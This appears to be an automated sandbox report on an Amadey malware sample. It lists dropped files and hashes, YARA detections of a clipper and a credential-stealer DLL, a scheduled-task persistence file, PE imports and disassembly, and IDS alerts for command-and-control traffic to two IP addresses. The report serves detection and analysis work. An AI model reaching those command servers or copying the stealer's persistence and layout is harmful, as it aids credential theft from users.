Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vngbf5j.ja3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f02eyuoi.dcz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fa5yahhb.dco.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2equz24.syp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpsjfwhk.scg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q14otdne.3da.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r34pnvst.2jc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sv3zyzpf.z1x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Download File

Process:	C:\Users\user\Desktop\tOuVwTJrau.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	441344
Entropy (8bit):	6.488128856014368
Encrypted:	false
SSDEEP:	12288:JOKJim5EI9tVEw/JF4+D3q2IMbgiDK7mWasB:Jj9tL8ZMEiDfWb
MD5:	4962575A2378D5C72E7A836EA766E2AD
SHA1:	549964178B12017622D3CBDDA6DBFDEF0904E7E2
SHA-256:	EFF5FAD47B9C739B09E760813B2BCBB0788EB35598F72E64FF95C794E72E6676
SHA-512:	911A59F7A6785DD09A57DCD6D977B8ABD5E160BD613786E871A1E92377C9E6F3B85FE3037431754BBDB1212E153776EFCA5FADAC1DE6B2AD474253DA176E8E53
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Joe Sandbox View:	Filename: yINR7uQlPr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L.....Zg..........................................@..........................0............@..................................F...................................E......8...........................8...@...............<............................text...z........................... ..`.rdata...I.......J..................@..@.data....m...`...,...H..............@....rsrc................t..............@..@.reloc...E.......F...v..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\tOuVwTJrau.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.36076412023942
Encrypted:	false
SSDEEP:	3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
MD5:	C2F3FBBBE6D5F48A71B6B168B1485866
SHA1:	1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
SHA-256:	C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
SHA-512:	E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1281024
Entropy (8bit):	6.466046469058072
Encrypted:	false
SSDEEP:	24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
MD5:	C6AABB27450F1A9939A417E86BF53217
SHA1:	B8EF3BB7575139FD6997379415D7119E452B5FC4
SHA-256:	B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
SHA-512:	E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................

C:\Windows\Tasks\Gxtuum.job

Download File

Process:	C:\Users\user\Desktop\tOuVwTJrau.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.410526155759918
Encrypted:	false
SSDEEP:	6:tp6bXflNeRKUEZ+lX1VsLlw3btPjgsW2YRZuy0lZtsEt0:tsrf2RKQ1VsLlw3BjzvYRQVZtNt0
MD5:	85FC2008CD4797D3582946DD61EB1C80
SHA1:	F043DF80705C17CDEF871055A96A79BA37B2AB05
SHA-256:	1820C4F84C3B25E18EDCA86809154540815B54DBD3EACAFCB91F47AE02CF3472
SHA-512:	536FCCA4B8F122C8D6078F052BD268BD4273AF6395979A1C41CCF65EEAFEFC741F5F6DFC2873951C981447F216A49060E849B41CD5A9F96748C01C9FB8A7BBE6
Malicious:	false
Preview:	......}...(L..F.H...F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.e.2.9.e.a.5.0.8.b.\.G.x.t.u.u.m...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.488128856014368
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tOuVwTJrau.exe
File size:	441'344 bytes
MD5:	4962575a2378d5c72e7a836ea766e2ad
SHA1:	549964178b12017622d3cbdda6dbfdef0904e7e2
SHA256:	eff5fad47b9c739b09e760813b2bcbb0788eb35598f72e64ff95c794e72e6676
SHA512:	911a59f7a6785dd09a57dcd6d977b8abd5e160bd613786e871a1e92377c9e6f3b85fe3037431754bbdb1212e153776efca5fadac1de6b2ad474253da176e8e53
SSDEEP:	12288:JOKJim5EI9tVEw/JF4+D3q2IMbgiDK7mWasB:Jj9tL8ZMEiDfWb
TLSH:	5A944B217817D032C62191B11FADFFF195ADA9259B710ADB7BC00E769A201E37A31F39
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........BS..,...,...,.../...,...).#.,...(...,.../...,...)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x42a6aa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x675A968B [Thu Dec 12 07:53:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	407b29a1346b818a12b66f58555063ce

Entrypoint Preview

Instruction
call 00007F04B8B31948h
jmp 00007F04B8B31179h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F04B8B309E3h
jmp 00007F04B8B312E2h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00466124h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00466124h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [00466124h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x64600	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6e000	0x45d4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5e1fc	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5e300	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5e238	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x33c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4f87a	0x4fa00	2993e117d95f1d03afa8a3d8f5d9b20b	False	0.47672807103610676	data	6.519213687781525	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x14910	0x14a00	a6230b79aa05b6ddd30d009bc284dd22	False	0.4825284090909091	data	5.334261055841523	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x66000	0x6ddc	0x2c00	d736e1b85746c6f27cfa8213be7d68d3	False	0.14923650568181818	data	3.309410946999413	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6d000	0x1e0	0x200	4a05bbd64487346fb2d65a9ea12c5f5e	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6e000	0x45d4	0x4600	4c333b90caefc486b7b1e29932b836ac	False	0.7053013392857143	data	6.635421796732803	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x6d060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	GetFileAttributesA, Process32NextW, CreateFileA, Process32FirstW, CloseHandle, GetSystemInfo, CreateThread, GetThreadContext, GetProcAddress, GetLastError, RemoveDirectoryA, ReadProcessMemory, CreateProcessA, CreateDirectoryA, SetThreadContext, SetEndOfFile, HeapSize, GetProcessHeap, SetEnvironmentVariableW, Wow64RevertWow64FsRedirection, GetTempPathA, Sleep, CreateToolhelp32Snapshot, OpenProcess, SetCurrentDirectoryA, GetModuleHandleA, ResumeThread, GetComputerNameExW, GetVersionExW, WaitForSingleObject, CreateMutexA, FindClose, PeekNamedPipe, CreatePipe, FindNextFileA, VirtualAlloc, Wow64DisableWow64FsRedirection, WriteFile, VirtualFree, FindFirstFileA, SetHandleInformation, WriteProcessMemory, GetModuleFileNameA, VirtualAllocEx, ReadFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, GetTimeZoneInformation, HeapReAlloc, ReadConsoleW, SetStdHandle, GetFullPathNameW, GetCurrentDirectoryW, DeleteFileW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, HeapAlloc, HeapFree, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, SetFilePointerEx, GetFileSizeEx, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, GetFileType, GetFileInformationByHandle, GetDriveTypeW, CreateFileW, RaiseException, GetCurrentThreadId, IsProcessorFeaturePresent, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, InitializeConditionVariable, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, SleepConditionVariableSRW, InitOnceComplete, InitOnceBeginInitialize, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, TryEnterCriticalSection, DeleteCriticalSection, WaitForSingleObjectEx, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, CreateEventW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, WriteConsoleW
USER32.dll	GetSystemMetrics, ReleaseDC, GetDC
GDI32.dll	CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, DeleteObject, BitBlt
ADVAPI32.dll	RevertToSelf, RegCloseKey, RegQueryInfoKeyW, RegGetValueA, RegQueryValueExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, CreateProcessWithTokenW, LookupAccountNameA, ImpersonateLoggedOnUser, RegSetValueExA, OpenProcessToken, RegOpenKeyExA, RegEnumValueA, DuplicateTokenEx, GetSidIdentifierAuthority
SHELL32.dll	SHGetFolderPathA, ShellExecuteA, SHFileOperationA
ole32.dll	CoUninitialize, CoCreateInstance, CoInitialize
WININET.dll	HttpOpenRequestA, InternetWriteFile, InternetOpenUrlA, InternetOpenW, HttpEndRequestW, HttpAddRequestHeadersA, HttpSendRequestExA, InternetOpenA, InternetCloseHandle, HttpSendRequestA, InternetConnectA, InternetReadFile
gdiplus.dll	GdiplusStartup, GdipSaveImageToFile, GdipGetImageEncodersSize, GdiplusShutdown, GdipGetImageEncoders, GdipCreateBitmapFromHBITMAP, GdipDisposeImage
WS2_32.dll	closesocket, inet_pton, getaddrinfo, WSAStartup, send, socket, connect, recv, htons, freeaddrinfo

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T07:47:05.831787+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49736	185.81.68.147	80	TCP
2024-12-13T07:47:05.846458+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49738	185.81.68.147	80	TCP
2024-12-13T07:47:08.802544+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49739	185.81.68.148	80	TCP
2024-12-13T07:47:10.493418+0100	2855239	ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)	1	192.168.2.4	49741	185.81.68.147	80	TCP
2024-12-13T07:47:10.515862+0100	2855239	ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)	1	192.168.2.4	49742	185.81.68.147	80	TCP
2024-12-13T07:47:11.583266+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49743	185.81.68.147	80	TCP
2024-12-13T07:47:11.952254+0100	2855239	ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)	1	192.168.2.4	49746	185.81.68.148	80	TCP
2024-12-13T07:47:11.952254+0100	2856150	ETPRO MALWARE Amadey CnC Activity M6	1	192.168.2.4	49746	185.81.68.148	80	TCP
2024-12-13T07:47:11.973837+0100	2855239	ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)	1	192.168.2.4	49747	185.81.68.148	80	TCP
2024-12-13T07:47:11.973837+0100	2856150	ETPRO MALWARE Amadey CnC Activity M6	1	192.168.2.4	49747	185.81.68.148	80	TCP
2024-12-13T07:47:14.878635+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49750	185.81.68.148	80	TCP
2024-12-13T07:47:15.970253+0100	2856151	ETPRO MALWARE Amadey CnC Activity M7	1	192.168.2.4	49752	185.81.68.148	80	TCP
2024-12-13T07:47:16.063977+0100	2856151	ETPRO MALWARE Amadey CnC Activity M7	1	192.168.2.4	49753	185.81.68.148	80	TCP
2024-12-13T07:47:21.332803+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49757	185.81.68.148	80	TCP
2024-12-13T07:47:27.441914+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49762	185.81.68.148	80	TCP
2024-12-13T07:47:33.552445+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49766	185.81.68.148	80	TCP
2024-12-13T07:47:39.660962+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49770	185.81.68.148	80	TCP
2024-12-13T07:47:45.832857+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49774	185.81.68.148	80	TCP
2024-12-13T07:47:51.971087+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49782	185.81.68.148	80	TCP
2024-12-13T07:47:58.126332+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49786	185.81.68.148	80	TCP
2024-12-13T07:48:04.221930+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49792	185.81.68.148	80	TCP
2024-12-13T07:48:10.290034+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49811	185.81.68.148	80	TCP
2024-12-13T07:48:16.362981+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49830	185.81.68.148	80	TCP
2024-12-13T07:48:22.439634+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49846	185.81.68.148	80	TCP
2024-12-13T07:48:28.519011+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	49863	185.81.68.148	80	TCP
